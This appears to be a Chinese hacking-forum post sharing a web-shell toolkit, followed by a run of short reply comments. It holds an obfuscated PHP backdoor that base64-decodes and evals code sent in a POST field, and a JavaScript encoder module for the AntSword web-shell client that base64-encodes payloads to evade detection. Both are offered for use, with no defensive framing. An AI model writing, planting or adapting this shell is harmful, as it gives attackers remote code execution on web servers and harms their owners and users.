<?php class c { public $code = null; public $decode = null; function __construct() { $this->code='ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFtpbWFnZV0pKTs='; $this->decode = @base64_decode( $this->code); @Eval($this->decode); } } new c(); ?>
蚁剑编码器
/** * php::特殊编码器 */ 'use strict'; /* * @param {String} pwd 连接密码 * @param {Array} data 编码器处理前的 payload 数组 * @return {Array} data 编码器处理后的 payload 数组 */ module.exports = (pwd, data, ext={}) => { let tmp = Buffer.from(Buffer.from(data['_'])).toString('base64'); data[pwd] = tmp; delete data['_']; return data; }
链接配置:
隐藏内容需要回复可以看见
回复
看下先!!!
666.回复下看看
666666
这就很厉害了
支持一个
支持一个
牛逼 必须看下
牛逼 必须看下
dwfwf.